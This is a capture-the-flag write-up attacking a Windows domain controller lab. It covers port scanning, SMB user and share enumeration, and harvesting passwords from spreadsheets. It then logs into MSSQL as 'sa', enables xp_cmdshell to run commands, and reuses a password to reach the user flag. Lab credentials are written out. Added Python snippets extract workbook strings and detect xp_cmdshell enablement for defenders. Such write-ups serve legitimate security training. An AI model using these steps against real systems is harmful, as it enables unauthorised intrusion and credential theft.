┌──(kali㉿kali)-[~/Downloads]
└─$ sudo nmap 10.10.11.51 -p- -sV -vv --open --reason -Pn
[sudo] password for kali:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-11 23:35 EST
NSE: Loaded 46 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 23:35
Completed Parallel DNS resolution of 1 host. at 23:35, 0.02s elapsed
Initiating SYN Stealth Scan at 23:35
Scanning 10.10.11.51 [65535 ports]
Discovered open port 445/tcp on 10.10.11.51
Discovered open port 135/tcp on 10.10.11.51
Discovered open port 53/tcp on 10.10.11.51
Discovered open port 139/tcp on 10.10.11.51
Discovered open port 49685/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 2.19% done; ETC: 23:58 (0:23:03 remaining)
SYN Stealth Scan Timing: About 4.63% done; ETC: 23:57 (0:20:57 remaining)
SYN Stealth Scan Timing: About 7.90% done; ETC: 23:54 (0:17:41 remaining)
SYN Stealth Scan Timing: About 10.93% done; ETC: 23:53 (0:16:26 remaining)
Discovered open port 49687/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 14.72% done; ETC: 23:53 (0:15:27 remaining)
SYN Stealth Scan Timing: About 18.75% done; ETC: 23:52 (0:13:43 remaining)
SYN Stealth Scan Timing: About 22.87% done; ETC: 23:51 (0:12:22 remaining)
SYN Stealth Scan Timing: About 27.57% done; ETC: 23:50 (0:10:57 remaining)
Discovered open port 49686/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 33.02% done; ETC: 23:49 (0:09:28 remaining)
Discovered open port 5985/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 37.62% done; ETC: 23:48 (0:08:34 remaining)
Discovered open port 49718/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 42.89% done; ETC: 23:48 (0:07:33 remaining)
SYN Stealth Scan Timing: About 48.83% done; ETC: 23:47 (0:06:28 remaining)
Discovered open port 636/tcp on 10.10.11.51
Discovered open port 1433/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 55.18% done; ETC: 23:47 (0:05:25 remaining)
Discovered open port 88/tcp on 10.10.11.51
Discovered open port 49794/tcp on 10.10.11.51
Discovered open port 47001/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 61.63% done; ETC: 23:46 (0:04:28 remaining)
Discovered open port 3269/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 68.57% done; ETC: 23:46 (0:03:31 remaining)
Discovered open port 49665/tcp on 10.10.11.51
Discovered open port 3268/tcp on 10.10.11.51
Discovered open port 49667/tcp on 10.10.11.51
Discovered open port 464/tcp on 10.10.11.51
Discovered open port 49739/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 75.54% done; ETC: 23:46 (0:02:39 remaining)
SYN Stealth Scan Timing: About 80.81% done; ETC: 23:46 (0:02:06 remaining)
Discovered open port 49664/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 86.23% done; ETC: 23:46 (0:01:31 remaining)
Discovered open port 49702/tcp on 10.10.11.51
Discovered open port 9389/tcp on 10.10.11.51
Discovered open port 593/tcp on 10.10.11.51
SYN Stealth Scan Timing: About 91.46% done; ETC: 23:46 (0:00:56 remaining)
Discovered open port 49666/tcp on 10.10.11.51
Discovered open port 389/tcp on 10.10.11.51
Completed SYN Stealth Scan at 23:45, 641.77s elapsed (65535 total ports)
Initiating Service scan at 23:45
Scanning 26 services on 10.10.11.51
Service scan Timing: About 61.54% done; ETC: 23:47 (0:00:34 remaining)
Completed Service scan at 23:47, 68.27s elapsed (26 services on 1 host)
NSE: Script scanning 10.10.11.51.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 23:47
Completed NSE at 23:47, 1.66s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 23:47
Completed NSE at 23:47, 1.83s elapsed
Nmap scan report for 10.10.11.51
Host is up, received user-set (0.34s latency).
Scanned at 2025-01-11 23:35:13 EST for 714s
Not shown: 65509 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-12 04:46:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49687/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49702/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49718/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49739/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49794/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 713.83 seconds
Raw packets sent: 131422 (5.783MB) | Rcvd: 402 (17.688KB)
Let's enumerate the users.
┌──(kali㉿kali)-[~/Downloads]
└─$ crackmapexec smb 10.10.11.51 --users -u 'rose' -p 'KxEPkKe6R8su'
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Enumerated domain user(s)
SMB 10.10.11.51 445 DC01 sequel.htb\ca_svc badpwdcount: 5 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\rose badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\sql_svc badpwdcount: 1 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\oscar badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\ryan badpwdcount: 0 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\michael badpwdcount: 1 desc:
SMB 10.10.11.51 445 DC01 sequel.htb\krbtgt badpwdcount: 1 desc: Key Distribution Center Service Account
SMB 10.10.11.51 445 DC01 sequel.htb\Guest badpwdcount: 1 desc: Built-in account for guest access to the computer/domain
SMB 10.10.11.51 445 DC01 sequel.htb\Administrator badpwdcount: 1 desc: Built-in account for administering the computer/domain
Let's check which shares are accessible over SMB.
"Accounting Department" looks suspicious.
┌──(kali㉿kali)-[~/htb/escapetwo]
└─$ crackmapexec smb 10.10.11.51 -u 'rose' -p 'KxEPkKe6R8su' --shares
SMB 10.10.11.51 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.51 445 DC01 [+] sequel.htb\rose:KxEPkKe6R8su
SMB 10.10.11.51 445 DC01 [+] Enumerated shares
SMB 10.10.11.51 445 DC01 Share Permissions Remark
SMB 10.10.11.51 445 DC01 ----- ----------- ------
SMB 10.10.11.51 445 DC01 Accounting Department READ
SMB 10.10.11.51 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.51 445 DC01 C$ Default share
SMB 10.10.11.51 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.51 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.51 445 DC01 SYSVOL READ Logon server share
SMB 10.10.11.51 445 DC01 Users READ
There are "accounting_2024.xlsx" and "accounts.xlsx", so let's download them.
┌──(kali㉿kali)-[~/htb/escapetwo]
└─$ smbmap -u rose -p KxEPkKe6R8su -H 10.10.11.51 -r "Accounting Department"
SMBMap - Samba Share Enumerator v1.10.4 | Shawn Evans
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.10.11.51:445 Name: dc01.sequel.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
Accounting Department READ ONLY
./Accounting Department
dr--r--r-- 0 Sun Jun 9 07:11:31 2024 .
dr--r--r-- 0 Sun Jun 9 07:11:31 2024 ..
fr--r--r-- 10217 Sun Jun 9 07:11:31 2024 accounting_2024.xlsx
fr--r--r-- 6780 Sun Jun 9 07:11:31 2024 accounts.xlsx
"accounts.xlsx" appears to be corrupted, but an xlsx file is basically a zip archive, so
I opened it with Kali's archive manager.
Excel stores its cell text in "sharedStrings.xml", and opening that file revealed a password.
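As an added example (not part of this writeup), the same extraction done programmatically: an .xlsx is a ZIP package and every cell string lives in xl/sharedStrings.xml, so a scanner checking shares for clear-text credentials can read that one member even when the workbook is too damaged for Excel to open. The sample workbook, the function names and the header heuristic are constructed for this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

SST_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Header names that mark a column as credential material (heuristic chosen for this example).
CRED_HEADER_RE = re.compile(r"(?i)^(pass(word)?|pwd|secret)$")


def build_damaged_workbook() -> bytes:
    """Constructed sample: the sheet XML is truncated so Excel refuses to open the
    file, but xl/sharedStrings.xml (where all cell text lives) is intact."""
    sst = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"'
        ' count="4" uniqueCount="4">'
        "<si><t>Username</t></si><si><t>Password</t></si><si><t>example.user</t></si>"
        "<si><r><t>Constructed</t></r><r><t>P@ss1</t></r></si></sst>"  # rich-text cell, two runs
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", sst)
        # Deliberately cut off mid-element to mimic a corrupted workbook.
        zf.writestr("xl/worksheets/sheet1.xml", '<worksheet><sheetData><row r="1"><c r="A1" t="s"><v>0')
    return buf.getvalue()


def shared_strings(xlsx_bytes: bytes) -> list[str]:
    """Return every cell string in an .xlsx, in sharedStrings.xml order.

    Cell text is stored once in xl/sharedStrings.xml as <si> entries; rich-text
    cells split one string across several <r><t> runs, which are joined here.
    Only that one ZIP member is read, so damage elsewhere does not stop extraction."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{SST_NS}t"))
            for si in root.iter(f"{SST_NS}si")]


def credential_headers(strings: list[str]) -> list[str]:
    """Strings that look like a credential column header: a sign the workbook
    stores secrets in clear text and should not sit on a readable share."""
    return [s for s in strings if CRED_HEADER_RE.match(s.strip())]


if __name__ == "__main__":
    found = shared_strings(build_damaged_workbook())
    print(found, credential_headers(found))
```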

MSSQL was running and it looked like I could log in as "sa", so I tried, and the login succeeded.
sudo impacket-mssqlclient 'sa:MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (sa dbo@master)> EXEC sp_configure 'Show Advanced Options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa dbo@master)> EXEC master..xp_cmdshell 'whoami'
output
--------------
sequel\sql_svc
NULL
SQL (sa dbo@master)>
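As an added defender-side example (not part of this writeup), the "Configuration option ... changed" messages shown above are also written to the SQL Server ERRORLOG, so a log monitor can flag the moment xp_cmdshell is switched from 0 to 1 while ignoring no-op changes such as the "1 to 1" line for 'show advanced options'. The log lines below are constructed and the function name is mine.

```python
import re

# ERRORLOG line shape: "<date> <time> <spid>  <message>". The sample lines are constructed.
CONFIG_CHANGE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Server-level options whose enablement hands OS command or COM execution to SQL logins.
WATCHED_OPTIONS = {"xp_cmdshell", "Ole Automation Procedures"}

SAMPLE_ERRORLOG = """\
2025-01-12 04:46:10.11 spid52      Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
2025-01-12 04:46:10.12 spid52      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2025-01-12 04:47:01.90 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2025-01-12 04:48:30.00 spid60      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""


def dangerous_enablements(errorlog: str) -> list[dict]:
    """Return one event per watched option that transitioned to enabled (new value 1).

    Lines that re-apply an already-enabled setting (old == new) and lines that
    disable an option are not alerts; the session id (spid) is kept so the event
    can be joined to the login that ran sp_configure."""
    events = []
    for line in errorlog.splitlines():
        m = CONFIG_CHANGE_RE.match(line)
        if not m:
            continue
        if m["option"] in WATCHED_OPTIONS and m["new"] == "1" and m["old"] != "1":
            events.append({"time": m["ts"], "spid": m["spid"], "option": m["option"]})
    return events


if __name__ == "__main__":
    for event in dangerous_enablements(SAMPLE_ERRORLOG):
        print(f"ALERT {event['time']} {event['spid']}: '{event['option']}' enabled")
```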
After poking around, I found a password in a config file.


I checked whether the password I obtained worked for other users, and "ryan" had the same password.

I connected with smbclient and retrieved the user flag without any trouble.
smbclient \\\\10.10.11.51\\Users -U ryan

